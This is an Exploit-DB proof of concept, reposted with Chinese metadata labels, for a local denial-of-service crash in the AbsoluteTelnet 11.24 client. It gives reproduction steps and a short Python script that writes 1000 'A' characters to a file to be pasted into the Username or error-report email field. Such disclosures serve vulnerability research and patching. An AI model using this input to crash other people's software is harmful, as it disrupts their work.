AbsoluteTelnet 11.24 – ‘Username’ Denial of Service (PoC)

  • 作者: Yehia Elghaly
    日期: 2021-11-11
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/50510/
  • # Exploit Title: AbsoluteTelnet 11.24 - 'Username' Denial of Service (PoC)
    # Discovered by: Yehia Elghaly
    # Discovered Date: 2021-11-10
    # Vendor Homepage: https://www.celestialsoftware.net/
    # Software Link: https://www.celestialsoftware.net/telnet/AbsoluteTelnet32.11.24.exe
    # Tested Version: 11.24
    # Vulnerability Type: Denial of Service (DoS) Local
    # Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64
    
    # Description: AbsoluteTelnet 11.24 - 'SHA1/SHA2/Username' and 'Error Report' Denial of Service (PoC)
    
    # Steps to reproduce:
    # 1. - Download and install AbsoluteTelnet
    # 2. - Run the python script and it will create exploit.txt file.
    # 3. - Open AbsoluteTelnet 11.24
    # 4. - "new connection file -> Connection -> SSH1 & SSH2" 
    # 5. - Paste the characters of txt file to "Authentication -> Username" 
    # 6. - press "ok" button
    # 7. - Crashed
    # 8. - Reopen AbsoluteTelnet 11.24
    # 9. - Copy the same characters to "Your Email Address (optional)"
    # 10.- Click "Send Error Report" button
    # 11.- Crashed
    
    
    #!/usr/bin/python
    
    exploit = 'A' * 1000
    
    try: 
    file = open("exploit.txt","w")
    file.write(exploit)
    file.close()
    
    print("POC is created")
    except:
    print("POC not created")